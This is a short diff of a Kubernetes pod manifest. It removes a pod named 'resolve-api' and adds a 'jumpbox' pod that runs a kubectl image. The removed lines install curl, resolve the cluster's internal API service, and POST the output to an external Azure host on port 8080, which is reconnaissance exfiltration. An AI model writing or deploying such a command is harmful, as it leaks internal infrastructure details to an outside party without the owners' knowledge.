--- a/deployment.yaml
+++ b/deployment.yaml
@@ -1,18 +1,13 @@
 apiVersion: v1
 kind: Pod
 metadata:
-  name: resolve-api
+  name: jumpbox
+  namespace: default
 spec:
   containers:
-    - name: shell
-      image: alpine
-      command:
-        - sh
-        - -c
-        - |
-          apk add --no-cache curl bind-tools;
-          {
-            echo '>> RESOLVENDO API INTERNA';
-            nslookup kubernetes.default;
-          } | curl -X POST --data-binary @- http://potter-maga.brazilsouth.cloudapp.azure.com:8080
+    - name: jumpbox
+      image: bitnami/kubectl:latest
+      command: ["sleep", "3600"]
+      tty: true
+      stdin: true
   restartPolicy: Never
